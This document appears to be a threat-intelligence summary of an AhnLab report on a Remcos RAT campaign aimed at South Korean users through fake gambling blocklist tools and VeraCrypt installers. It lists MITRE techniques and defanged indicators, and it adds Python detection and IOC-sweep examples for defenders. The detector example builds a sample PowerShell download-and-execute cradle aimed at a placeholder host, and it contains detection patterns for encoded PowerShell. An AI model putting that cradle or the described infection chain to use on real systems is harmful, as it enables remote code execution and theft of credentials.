Remcos RAT Being Distributed to Korean Users

AhnLab confirmed a Remcos RAT campaign targeting users in South Korea that uses fake blocklist‑lookup tools for illegal gambling sites and counterfeit VeraCrypt installers to distribute multi‑stage droppers. The attack chain leverages obfuscated VBS/PowerShell scripts, a .NET injector that sends logs via Discord webhooks and injects Remcos into AddInProcess32.exe, with IOCs including chaoanh[.]xyz URLs, specific IPs, and multiple MD5 hashes. #Remcos #VeraCrypt

Keypoints

  • Remcos RAT is being distributed to users in South Korea by impersonating blocklist‑lookup tools used in illegal gambling ecosystems and by posing as VeraCrypt installers.
  • Initial droppers embed multiple malicious VBS scripts in resources that are written to %TEMP% and executed, and some samples are packaged as 7z SFX installers.
  • The infection chain comprises multiple obfuscated VBS and PowerShell stages that hide a Base64‑encoded PE payload and lead to a .NET injector and Remcos payload delivery.
  • The .NET injector exfiltrates logs via Discord webhooks, downloads and decrypts the Remcos payload, and injects it into AddInProcess32.exe; it contains Korean language strings in its routines.
  • Remcos capabilities include remote control, keylogging, screenshots, webcam/microphone access, and credential extraction from web browsers; offline keylogs may be stored in %ALLUSERSPROFILE%\remcos.
  • IOCs published include five MD5 hashes, multiple download URLs hosted on chaoanh[.]com/.xyz, and three C2 IP addresses using TLS; filenames used include *****usercon.exe, blackusernon.exe, and installer.exe.

MITRE Techniques

  • [T1036] Masquerading – Attackers disguised malware as legitimate tools and installers, e.g., pretending to be VeraCrypt installers or “Blocklist User DB Lookup” tools (‘Another strain disguises itself as a VeraCrypt utility installer, distributed as installer.exe.’).
  • [T1204.002] User Execution: Malicious File – Users are lured into executing malicious files delivered via web browsers and Telegram with deceptive filenames (‘Distribution has occurred through web browsers and Telegram, using file names such as “*****usercon.exe” or “blackusernon.exe.”’).
  • [T1027] Obfuscated Files or Information – The campaign uses multiple stages of obfuscated VBS and PowerShell scripts with dummy comments and junk data to hide payloads (‘The threat actor used multiple stages of obfuscated VBS and PowerShell scripts… include dummy comments, junk data, and misleading extensions.’).
  • [T1105] Ingress Tool Transfer – Payloads and staged components are retrieved from remote URLs (chaoanh[.]xyz/chaoanh[.]com) during the infection chain (‘It then downloads Remcos RAT payload from a URL passed as an argument’).
  • [T1071.001] Application Layer Protocol: Web Protocols (HTTPS/TLS) – C2 communications are conducted over TLS to remote IPs and ports listed in configurations (‘142.248.231[.]252:48192 (TLS)’, ‘142.248.231[.]251:2404 (TLS)’).
  • [T1055] Process Injection – The .NET injector decrypts the Remcos payload and injects it into AddInProcess32.exe to run stealthily (‘injects it into the AddInProcess32.exe process.’).
  • [T1056.001] Input Capture: Keylogging – Remcos variants enable offline keylogging and store captured keystrokes locally (‘offline keylogging enabled, the captured keystroke strings are stored in the %ALLUSERSPROFILE%\remcos directory.’).
  • [T1555.003] Credentials from Web Browsers – The RAT includes functionality to extract credentials from web browsers (‘extraction of web browser credentials’).
  • [T1102] Web Service – The injector exfiltrates logs to the attacker using Discord Webhooks, leveraging a web service for outbound communication (‘The injector sends logs to the attacker via Discord Webhooks.’).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Variants use registry keys (including Korean‑language strings), which indicates registry‑based persistence (‘Some variants… use Korean strings in their mutex names and registry keys.’).
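The technique list above maps onto a handful of behavioural signals a defender can check in endpoint telemetry: a script host launching a .vbs from %TEMP%, an encoded PowerShell command spawned by that script host, and AddInProcess32.exe (a .NET add-in host that has no business talking to the internet) opening outbound connections. The following Python is an added example written for this summary, not code from AhnLab or from the report; the event dicts are constructed to resemble a few fields of process-creation and network-connection telemetry (in the style of Sysmon Event IDs 1 and 3), the paths and the encoded command are made up, and the only campaign-specific value reused is the 142.248.231[.]252:48192 C2 pair quoted on this page.

```python
"""Behavioural checks for the Remcos delivery chain summarised above (added example)."""
import base64
import re

# Constructed sample: a benign-looking encoded command built here so the
# example stays self-contained. The real campaign's scripts are not reproduced.
ENCODED_CMD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2')"
    .encode("utf-16-le")
).decode()

# Constructed telemetry. Field names are assumptions, not a real product schema.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\victim\AppData\Local\Temp\a1b2c3d4.vbs"',
     "parent": r"C:\Users\victim\downloads\programs\blackusernon.exe"},
    {"type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED_CMD}",
     "parent": r"C:\Windows\System32\wscript.exe"},
    {"type": "network",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
     "dest_ip": "142.248.231.252", "dest_port": 48192},
    {"type": "network", "image": r"C:\Windows\System32\svchost.exe",
     "dest_ip": "10.0.0.5", "dest_port": 443},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe", "parent": r"C:\Windows\explorer.exe"},
]

# A .vbs living under the user's Temp directory (the report says the droppers
# write their embedded scripts to %TEMP% and run them from there).
TEMP_VBS = re.compile(r"\\AppData\\Local\\Temp\\[^\"']+\.vbs", re.IGNORECASE)
# PowerShell accepts abbreviated forms of -EncodedCommand; capture the payload.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        # PowerShell encodes the command as UTF-16LE before Base64.
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Apply the behavioural rules and return (rule_name, detail) findings."""
    findings = []
    for ev in events:
        image = ev["image"].lower()
        if ev["type"] == "process":
            cmd = ev["cmdline"]
            parent = ev.get("parent", "").lower()
            if image.endswith(("wscript.exe", "cscript.exe")) and TEMP_VBS.search(cmd):
                findings.append(("vbs_from_temp", cmd))
            if image.endswith("powershell.exe"):
                decoded = decode_encoded_command(cmd)
                if decoded is not None:
                    findings.append(("encoded_powershell", decoded))
                # Script host spawning PowerShell matches the VBS -> PowerShell staging.
                if parent.endswith(("wscript.exe", "cscript.exe")):
                    findings.append(("script_host_spawned_powershell", parent))
        elif ev["type"] == "network":
            # AddInProcess32.exe normally has no outbound traffic; baseline it,
            # then treat any connection as worth triage (the injector targets it).
            if image.endswith("addinprocess32.exe"):
                findings.append(("addinprocess32_network",
                                 f"{ev['dest_ip']}:{ev['dest_port']}"))
    return findings


if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_EVENTS):
        print(f"{rule:32} {detail}")
```

The rules are deliberately independent so each can be lifted into a SIEM query on its own; correlating them on the same host within a short window (the script-host-to-PowerShell edge plus a later AddInProcess32.exe connection) is what turns three medium-confidence signals into one high-confidence alert for this chain.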

Indicators of Compromise

  • [MD5 Hash] Sample file hashes observed in the campaign – 06c71658466d1dcd067ff0f23a8c488e, 0e7a97c8ecf83f26b23c394d0e06001b, and 3 more hashes.
  • [URL] Download and payload delivery endpoints used to host staged payloads – https[:]//chaoanh[.]com/XX12[.]JPG, https[:]//chaoanh[.]xyz/Aw21[.]JPG, and 3 more URLs.
  • [Domain] Domains hosting malicious JPG‑named downloaders and payloads – chaoanh[.]xyz, chaoanh[.]com.
  • [IP Address] Command‑and‑control servers observed (TLS) – 142[.]248[.]231[.]251, 205[.]198[.]88[.]94, and 1 more IP (142[.]248[.]231[.]252).
  • [File name / Path] Distribution and temporary filenames used during execution – %USERPROFILE%\downloads\programs\*****usercon.exe, %TEMP%\[Random].vbs, and other staged names like Aw21.JPG/XX12.JPG.
  • [File name] Installer and dropper filenames used to entice execution – installer.exe (VeraCrypt impersonation), blackusernon.exe.
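The indicators are published defanged (`[.]`, `[:]`), so the first step in using them is to refang them and then sweep existing proxy, firewall, DNS and EDR logs for hits. The script below is an added example for this summary, not tooling from AhnLab; it carries only the indicators printed on this page (the "and N more" entries are not reproduced), and the log lines it scans are constructed for illustration in a made-up key=value format.

```python
"""Refang the published Remcos IOCs and sweep sample log lines for them (added example)."""
import re

# Indicators exactly as published (defanged) on this page. Entries summarised
# as "and N more" above are not available here and are therefore omitted.
DEFANGED = {
    "md5": ["06c71658466d1dcd067ff0f23a8c488e", "0e7a97c8ecf83f26b23c394d0e06001b"],
    "url": ["https[:]//chaoanh[.]com/XX12[.]JPG", "https[:]//chaoanh[.]xyz/Aw21[.]JPG"],
    "domain": ["chaoanh[.]xyz", "chaoanh[.]com"],
    "ip": ["142[.]248[.]231[.]251", "142[.]248[.]231[.]252", "205[.]198[.]88[.]94"],
}


def refang(value):
    """Undo the common defanging conventions so values match real log content."""
    return (value.replace("[.]", ".")
                 .replace("[:]", ":")
                 .replace("hxxps://", "https://")
                 .replace("hxxp://", "http://"))


# Normalised lookup sets (lower-cased so matching is case-insensitive).
IOCS = {kind: {refang(v).lower() for v in vals} for kind, vals in DEFANGED.items()}

DOMAIN_RE = re.compile(r"\b([a-z0-9.-]+\.[a-z]{2,})\b")
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
MD5_RE = re.compile(r"\b([0-9a-f]{32})\b")

# Constructed sample log lines (not real telemetry).
SAMPLE_LOGS = [
    "proxy user=alice dst=https://chaoanh.xyz/Aw21.JPG status=200",
    "fw action=allow src=10.1.2.3 dst=142.248.231.252 dport=48192 proto=tcp",
    "dns query=www.example.com type=A",
    "edr file=installer.exe md5=0E7A97C8ECF83F26B23C394D0E06001B",
    "fw action=allow src=10.1.2.3 dst=8.8.8.8 dport=53 proto=udp",
]


def scan_line(line):
    """Return a list of (ioc_type, value) hits found in one log line."""
    low = line.lower()
    hits = []
    for url in IOCS["url"]:
        if url in low:
            hits.append(("url", url))
    for dom in DOMAIN_RE.findall(low):
        # Exact match or a subdomain of a listed domain.
        if dom in IOCS["domain"] or any(dom.endswith("." + d) for d in IOCS["domain"]):
            hits.append(("domain", dom))
    for ip in IP_RE.findall(low):
        if ip in IOCS["ip"]:
            hits.append(("ip", ip))
    for digest in MD5_RE.findall(low):
        if digest in IOCS["md5"]:
            hits.append(("md5", digest))
    return hits


def scan_logs(lines):
    """Return [(line_index, hits)] for every line with at least one IOC hit."""
    results = []
    for idx, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            results.append((idx, hits))
    return results


if __name__ == "__main__":
    for idx, hits in scan_logs(SAMPLE_LOGS):
        print(f"line {idx}: {hits}")
        print(f"  {SAMPLE_LOGS[idx]}")
```

Hash hits are the strongest signal because they tie a host to a specific sample; domain and IP hits on their own still need the TLS-port detail from the configuration quoted above (48192 and 2404 on 142.248.231[.]251/252) to separate C2 sessions from unrelated traffic to shared infrastructure.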


Read more: https://asec.ahnlab.com/en/92160/